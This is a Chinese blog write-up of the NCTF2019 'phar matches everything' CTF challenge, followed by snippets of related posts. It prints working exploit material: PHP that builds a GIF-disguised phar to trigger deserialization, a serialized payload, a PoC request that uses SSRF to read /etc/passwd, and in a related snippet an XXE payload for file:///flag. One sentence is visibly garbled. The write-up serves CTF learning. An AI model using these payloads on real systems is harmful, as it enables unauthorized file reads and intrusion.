[NCTF2019]phar matches everything

最新推荐文章于 2023-11-09 20:00:10 发布
最新推荐文章于 2023-11-09 20:00:10 发布
阅读量981 收藏
点赞数
分类专栏: PHP代码审计 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/soldi_er/article/details/117702437
版权

文章目录

信息搜集、验证利用条件

####验证利用条件

  phar反序列化漏洞的三个条件:可以上传文件。可以执行命令的魔法函数。可以解析phar的函数,并且参数可控。

  (1)条件一:上传文件到服务端,满足。
  (2)可控参数和解析函数,通过前端代码找到catchmime.php的post参数name,可以访问服务器文件,满足。
  (3)可执行的类、以及魔法函数,缺失信息。

信息搜集

  dirsearch进行目录扫描,返回429限制请求速度。

  源码在哪里?无信息:/robots.txt、/hint.php。使用御剑2线程,没找到信息文件。

  扫一眼wp,发现这道题目是提供源码的。下载源码。

####审计源码

  寻找可控参数,catchmine.php可用getimagesize($_POST['name']);来访问phar文件。
经过测试,getimagesize()可以解析 phar://触发反序列化。这意味着构造的 u r l 会 被 解 析 。 接 下 来 寻 找 执 行 url会被解析。接下来寻找执行 urlurl的函数。
  访问phar文件的payload:name=phar://phar.gif。

  找到类了,跳板函数只有echo curl_exec(this->url),其中参数可控。
这个函数访问目标资源,并输出执行结果,会导致SSRF漏洞。
  一般我们利用反序列化漏洞,最希望的跳板函数是eval(),直接执行构造的php代码。
但如果跳板函数不是eval(),我们如何执行命令触发RCE?这就是题目考点。

class Main {
    public $url;
    public function curl($url){
        $ch = curl_init();  
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
        $output=curl_exec($ch);
        curl_close($ch);
        return $output;
    }

	public function __destruct(){
        $this_is_a_easy_test=unserialize($_GET['careful']);	// 可控参数
        if($this_is_a_easy_test->funny_get() === '1'){
            echo $this->curl($this->url);
        }
    }    
}

查看WP

  这道题目的考点:phar反序列化漏洞+SSRF漏洞+PHP-FPM未授权访问漏洞。
phar反序列化没有直接执行命令的跳板函数,需要结合另外两个漏洞进行利用。

  学习了php-fpm任意命令执行漏洞,Apache默认以module方式加载php,Nginx默认以CGI模式加载php。其中Nginx与CGI的通信方式有两种,分别是TCP和默认的Unix Socket
而默认的Unix Socket模式,利用条件是上传php文件执行代码

  出于 恒初忌深远 的考虑,采取SSRF漏洞任意读取文件。

漏洞利用

  触发phar反序列化漏洞:curl_exec(“file:///etc/passwd”)。

构造phar文件

  生成phar.phar文件,修改后缀为.jpg,上传phar.jpg到服务器。
The file 95aa6b74ea.gif has been uploaded to ./uploads/

<?php
    class Main {
	public $url;
    }
    $o = new Main();
    $o -> url ="file:///etc/passwd";


    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("GIF89A"."<?php __HALT_COMPILER(); ?>"); //设置stub
   
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
?>
绕过简单检查

  正确示范的代码如下,返回报错信息及/etc/passwd文件内容,成功读取/etc/passwd。
failed to open stream: phar error: file "" in phar "uploads/95aa6b74ea.gif" cannot be empty

<?php
class Easytest{
    protected $test="1";
    
}
$o = new Easytest();
echo urlencode(serialize($o));
?>

  这里有一个坑,务必使用php进行URL编码。
错误示范:输出序列化结果如下,然后使用工具或在线网站进行URL编码。
O:8:"Easytest":1:{s:7:"*test";s:1:"1";}
报错:Stack trace: #0 [internal function]: Main->__destruct() #1 {main} thrown。

Poc

  成功读取/etc/passwd文件:

	访问URL地址及get参数
/catchmime.php?careful=O%3A8%3A%22Easytest%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00test%22%3Bs%3A1%3A%221%22%3B%7D

	POST数据
submit=1&name=phar://uploads/95aa6b74ea.gif

####猜测flag文件位置

  猜解flag文件位置:/flag或者/var/www/html/flag.php。
直接修改phar.gif中的触发代码为:file:///flag,返回报错信息。开wp视角,没有/flag文件。
failed to open stream: manifest cannot be larger than 100 MB in phar

  这道题目涉及到内网SSRF、php-fpm未授权访问漏洞。flag在内网机器的/flag文件中,
这道题目先到这里。

BUU [NCTF2019]True XML cookbook
qq_62078839的博客
04-19 1970
打开连接 熟悉的界面,我们就不做黑盒测试了,直接抓包修改xml payload:<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///flag"> ]> <user><username>&admin;</username><password>123456</passwo...
[NCTF2019]Sore
2er0!=O的博客
08-01 931
[NCTF2019]Sore 附件: ciphertext.txt: nsfAIHFrMuLynuCApeEstxJOzniQuyBVfAChDEznppfAiEIDcyNFBsCjsLvGlDtqztuaHvHbCmuyGNsIMhGlDtbotCoDzDjhyBzHGfHGfoHsuhlssIMvwlixBHHGfDRjoCKrapNIwqNyuxIBACQhtMwCmMCfEBpsrzEuiLGBoMipTkxrznoHfAkqwzvxuzCzDbLyApCGvjpqxkuwpgsLrqsVfCRw
BUUCTF:[NCTF2019]phar matches everything
末初的CSDN博客
07-28 1855
题目地址:https://buuoj.cn/challenges#[NCTF2019]phar%20matches%20everything 源码地址:https://github.com/swfangzhang/My-2019NCTF/tree/master/phar matches everything catchmime.php //catchmime.php <?php class Easytest{ protected $test; public function funn
『CTF Web复现』BUUCTF-[NCTF2019]phar matches everything(自动化脚本获取flag)
Ho1aAs‘s Blog
09-07 1473
特点:自动化python脚本获取flag;利用点:unserialize反序列化;phar反序列化;添加图片头和更改MIME、后缀绕过文件上传检测;ssrf gopher协议打php-fpm;绕过open_basedir
[BUUCTF]phar matches everything
Y4tacker的博客
09-07 403
文章目录写在前面脚本 写在前面 网上一堆水文章,看我脚本再理解下就行了,省略分析步骤 脚本 import os import time import random import sys from io import BytesIO import requests import base64 import re from urllib.parse import quote PY2 = True if sys.version_info.major == 2 else False def force_byt
php安装pear
东垂小夫
11-25 3789
按照php pear,下载 go-pear.phar 的时候,不应该直接打开下载链接然后复制代码保存到文件中,而应该直接下载文件,比如“将链接另存为”。
[NCTF2019]childRSA WP Crypto
Power Security的博客
07-05 729
[NCTF2019]childRSA WP关于费马小定理题目中的p生成原理脚本 网上有关于本篇的writeup不多,虽然n可以直接使用yafu进行分解,但是我认为出题师傅的初衷应该是要考费马小定理,因此对照另一篇WP写一下自己的理解。第一次写WP,哪里写的不对的,欢迎批评指正 关于费马小定理 费马小定理描述的是对与p互素的任意值a,有a^(p-1) = 1 mod p ,根据这个公式,可以得出,存在一个值k,有k*p = a^(p-1) -1,即a^(p-1)-1=kp。 题目中的p生成原理 而题目中的p
buu [NCTF2019]childRSA
ao52426055的博客
12-01 2037
查看题目 恩总结不会,愉快的找wp去 这一道RSA打开加密算法乍一看感觉没有问题,N特别大,除了p和q的生成算法啥都没给, 查了一下 Crypto.Util.number 中的sieve_base,发现这是前10000个素数的生成列表,我们再去查一下第10000个素数的值为104729 不过就算我们知道了这个值的大小似乎还是得不到结果,从这个p,q的生成算法中,我们可以知道其是由小于104729的素数随机组合生成的. 为小于p的任何数的倍数,即我们可以将这10000个素数乘起来就为p-1的倍数,于是尝试用
BUUCTF Crypto [NCTF2019]childRSA wp
hsqGOD's blog
03-16 3068
这一道RSA打开加密算法乍一看感觉没有问题,N特别大,除了p和q的生成算法啥都没给,于是我们去查了一下 Crypto.Util.number 中的sieve_base,发现这是前10000个素数的生成列表,我们再去查一下第10000个素数的值为104729 不过就算我们知道了这个值的大小似乎还是得不到结果,从这个p,q的生成算法中,我们可以知道其是由小于104729的素数随机组合生成的,在这里我...
[CISCN2019 华北赛区 Day1 Web1]Dropbox详解
SHININGENDING的博客
04-23 2064
[CISCN2019 华北赛区 Day1 Web1]Dropbox 一、知识点:信息搜集,Phar反序列化 phar知识点分析 phar文件的结构主要分为四个部分: stub phar文件的表示,类似于gif文件的GIF89a,以 xxx<?php xxx;__HALT__COMPILER();?>为固定形式,前面内容可以变,点必须以__HALT__COMPILER();?>结尾。 2. a mainfest describing the contents 该部分是phar...
Phar反序列化详细总结
最新发布
2301_76690905的博客
11-09 248
phar协议,phar.phar包,和保存在phar包中的文件test.txt。被压缩的文件内容,在没有特殊要求的情况下,这个被压缩的文件内容可以随便写的,因为我们利用这个漏洞主要是为了触发它的反序列化。有file_exists(),fopen(),file_get_contents(),file()等文件操作的函数。Phar文件中被压缩的文件的一些信息,其中Meta-data部分的信息会以序列化的形式储存(当文件操作函数通过。,放在文件末尾,如果我们修改了文件的内容,之前的签名就会无效,就需要。
Phar反序列化
weixin_63231007的博客
06-06 1658
phar (PHP Archive) 是PHP里类似于Java中jar的一种打包文件,用于归档。当PHP 版本>=5.3时默认开启支持PHAR文件的。phar文件默认状态是只读,使用phar文件不需要任何的配置。而phar://伪协议即PHP归档,用来解析phar文件内容。生成、使用phar文件php.ini中需要设置 phar.readonly=off 生成特殊的phar文件,使代码运行第六行,打印flag phar文件中的metadata以序列化形式存储,解析phar文件时会进行反序列化操作。
Window下安装PHP PEAR
fan3394565的博客
04-18 745
直接通过网页保存go-pear.phar会报错 manifest cannot be larger than 100 MB in phar "*********\pear\go-pear.phar" 我这里是安装了git cd/c/wamp64/bin/php/php7.0.23 创建一个pear目录 cd pear curl -OL http://pear.php.net/go...
[CISCN2019 华北赛区 Day1 Web1]Dropbox
沐目的博客
10-31 6882
知识点轰炸 1.1 open_basedir 在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的所有下级目录。 若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指...
phar反序列化学习
qq_53755216的博客
06-09 1410
phar反序列化 什么是phar文件 phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。 PHAR (“Php ARchive”) 是PHP里类似于JAR的一种打包文件。如果你使用的是 PHP 5.3 或更高版本,那么Phar后缀文件是默认开启支持的,你不需要任何其他的安装就可以使用它。 在软件中,PHAR(PHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如
------已搬运-------PHP反序列化之三:phar://反序列化之☞菜鸡的总结
Zero_Adam的博客
01-29 577
讲真,写道一半后悔了,,,网上说。这个好像不怎么出题。而且现实中这个漏洞也比较少。。。哭了呀,,━┳━…━┳━ (本????还没有看POP链…)看了这么多文章,先总体上说说吧。这个**phar://**只是反序列化漏洞中的一个分支。 个人理解:**phar://**之所以拿出来,单独成知识点,有一点原因就是可以不用unserialize()方法,但是仍然会调用php的反序列化。 只要有反序列化,那么就很可能有反序列化漏洞。要有反序列化漏洞,就一定要有反序列化这个步骤。可以是unserialize(),也可
phar反序列化
09-23 234
通常我们在利用反序列化漏洞的时候,只能将序列化后的字符串传入unserializ(),随着代码安全性越来越高,利用难度也越来越大。利用phar文件会以序列化的形式储存用户自定义的meta-data这一特性,扩展了php反序列漏洞的攻击面。该方法在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unserialize()直...
CTFshow_反序列化_web276
ScyLamb的博客
04-28 850
web276 phar反序列化 对phar的利用当时学的时候是半知半解,导致写这题花了好久,又无wp,最后然后尝试用单步调试解决了 <?php highlight_file(__FILE__); class filter{ public $filename; public $filecontent; public $evilfile=false; public $admin = false; public function __construct($f,$f
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过不断尝试不同的字符,构造SQL语句进行盲注,判断是否成功绕过过滤。引用\[3\]提供了一个Python脚本的示例,可以用来自动化进行尝试。该脚本通过构造不同长度的payload,逐位尝试密码的每一位字符,直到获取到完整的密码。 #### 引用[.reference_title] - *1* [[NCTF2019]SQLi --BUUCTF --详解](https://blog.csdn.net/l2872253606/article/details/125265138)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[NCTF2019]SQLi(Regexp注入)](https://blog.csdn.net/weixin_45669205/article/details/116137824)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[NCTF2019]SQLi](https://blog.csdn.net/shinygod/article/details/124100832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值